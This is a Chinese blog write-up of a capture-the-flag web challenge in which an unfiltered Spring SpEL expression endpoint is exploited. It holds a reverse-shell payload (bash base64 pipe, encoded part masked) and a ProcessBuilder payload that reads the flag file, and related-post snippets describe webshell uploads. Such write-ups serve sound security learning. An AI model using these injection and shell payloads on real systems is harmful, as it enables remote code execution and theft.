PolarCTF WEB题目 ezjava WP

已于 2023-10-13 10:21:36 修改
阅读量464 收藏 1
点赞数 2
分类专栏: CTF 文章标签: 前端 java 网络安全 代码复审 web安全
于 2023-10-13 10:17:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62257805/article/details/133804482
版权

一、题目信息

先附上靶场链接:www.polarctf.com
ezjava这道题给了个jar包,所以先下载下来反编译看看怎么个事。
在这里插入图片描述
直接放入idea中并添加为库,反编译看看内容:
在这里插入图片描述

二、SPEL注入漏洞

controller层中存在如下代码:

    public String spelVul(String ex) {
        ExpressionParser parser = new SpelExpressionParser();
        EvaluationContext evaluationContext = new StandardEvaluationContext();
        String result = parser.parseExpression(ex).getValue(evaluationContext).toString();
        System.out.println(result);
        return result;
    }

熟悉Java的朋友就可以一眼定真,这不是spel表达式注入嘛?
ex参数没有任何过滤直接打就可。
路由:/SPEL/vul,可以看到2-1确实返回了运算结果,说明能解析。
在这里插入图片描述
尝试弹个shell到服务器:

T(java.lang.Runtime).getRuntime().exec("bash -c {echo,xxxxxxxxxxxxxxxxxxx}|{base64,-d}|{bash,-i}")

弹了半天连不上,不解析?有waf? 靶场不出网!
那就直接读flag吧,题目给了flag路径/app/flag.txt

new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /app/flag*"}).start().getInputStream(), "gbk")).readLine()

发包即可:

Bestow.992
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF webwp
weixin_45694388的博客
10-11 1018
1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次base64后,观察格式后发现是hex编码,解码出flag 3.Decoede me 一道php的加密题 strrev(): 逆序 substr(): 返回字符串第0以后的1位ord():ord()函数返回字符串的首个字符的ASCII值。chr():从ascii表返回第_0以后的1位 ord(): or
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目WP,其中也有别人的WP
【BUGKU之ez_java_serialize】
qq_40646572的博客
04-12 5170
BUGKU之java反序列化练习
Web】2024 京麒CTF ezjvav题解
最新发布
uuzeray的博客
05-27 983
有两层waf,一个是明文流量层面的检测,一个是反序列化过程的检测,前者可以自定义输出流改写序列化数据绕过。另外附上,在打入TemplatesImpl的部分,fj原生反序列化的打法。带着伪造的jwt访问./source,拿到题目源码jar包。waf部分,只看前者的话,就是ban掉了Rome的一些打法。cmd=sudo cat /flag拿到flag。也可以打fastjson原生反序列化。可以打jackson原生反序列化。admin/admin成功登录。反序列化入口在./Jsrc路由。访问./source。
NSS [NUSTCTF 2022 新生赛]Ezjava1
Jay17的博客
08-30 823
NSS [NUSTCTF 2022 新生赛]Ezjava1
Polar_CTF_REVERSE_Java_Tools
weixin_62626298的博客
10-13 180
Judge() : 函数首先定义了两个Character形数组,这个函数展示了 不同类型的字符数据 如何转为同一类型,本函数中有两个方法,如果一个是String 类型,一个是Char 数组类型,即使内容相等,equals函数 也会返回False。Tools类中有四个函数,分别是Re,Xor,ADD_1,Judge函数,分别分析一下他们的功能。Add_1 () : 对传入的字符串数组的每一位 进行 后移操作,后移的不长是我们传入的参数X。输入的类,进行了两次输出,一次输入,并调用了。中的三个函数,分别是。
Polarctfweb ezjava
xsx213的博客
10-13 205
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
m0_61206225的博客
11-08 1093
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTF-5#进击!拿到Web最高权限-WP
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WPWeb)是CTF中的一种挑战形式,旨在让参与者...
Github:ez java学习
03-06
我做的第一件事 这是非常基础的Java东西 我发布我需要的项目和东西,这里的一切都是我制造的,除非它在开始时有一个@author,我会把它们归功于它!!! 示例:C
Web编程2:wp2
02-12
在本项目"Web编程2:wp2"中,我们将深入探讨网络编程的各个方面,特别是与PHP相关的技术。项目成员包括Rifki Azizi和18090020号学员,以及团队成员5A。从提供的文件名"Web-Programming-2-main"来看,这可能是一个...
web-product-dark_WordPress_wp_
10-03
【标题】"web-product-dark_WordPress_wp_" 指的是一款专门为RevoSlider设计的WordPress主题,名为"web-product-dark"。RevoSlider是一个流行的WordPress滑块插件,用于创建吸引人的动态内容展示,如产品滑块、图像...
隐藏的信息-题目WP以及知识点详解.zip
03-10
该压缩包文件包含题目原题、解题思路(WP,Write-up)以及相关知识点的详解,对于提升网络安全技能具有很高的学习价值。 首先,让我们来看看"音频隐写"这个标签。音频隐写术是利用音频文件的特性,将秘密信息嵌入...
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs中创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
[祥云杯 2022]ezjava
Sentiment的博客
11-04 1033
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
[JAVA安全分享]从第二届网刃杯CTF题目学习JAVA SPEL表达式注入
GX233的博客
04-27 1930
SPEL注入
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1612
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
ctfhub 全部WP
09-22
引用:MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。 它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。 常见的MME类型,例如:   超文本标记语言文本 .html,html text/htm   普通文本 .txt text/plain   RTF文本 .rtf application/rtf   GIF图形 .gif image/gif   JPEG图形 .jpg image/jpeg 上传包含一句话木马的php文件,然后使用burp抓包,修改数据包的content type为image/gif(注意是第二个content type)发送到repeater修改后,点击send,然后放包,即可显示上传php文件成功后的相对路径。使用蚁剑连接该一句话木马即可获得flag。 文件头检查 。 引用: htaccess 查看网页源码,可以看到常用的文件后缀都被禁用。根据题目的提示,.hatccess文件【.htaccess是Apache服务器的一个配置文件。它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面,改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】 前提:mod_rewrite模块开启,配置文件中LoadMoudle rewrite_module module modules/mod_rewrite.so AllowOverride All,配置文件中AllowOverride All (如果可能做题过程中结果出现问题,但步骤正确,可以看看前提是否正确) 。 引用:文件头检验 是当浏览器在上传文件到服务器的时候,服务器对所上传文件的Content-Type类型进行检测。如果是白名单允许的,则可以正常上传,否则上传失败。 当我们尝试上传一句话木马的php文件,出现了正确后缀类型的弹窗。使用010editor制作一张图片木马,上传时使用burp抓包把文件后缀改为php,然后点击send。使用蚁剑连接php文件,即可在对应目录下找到flag。 00截断 。 关于ctfhub的全部WP,很抱歉我无法提供相关信息。由于ctfhub是一个综合性的CTF平台,涵盖了大量的题目和解题思路,每个题目WP都有着不同的内容和解法。如果您对特定的题目或解题方法感兴趣,我可以为您提供更多信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值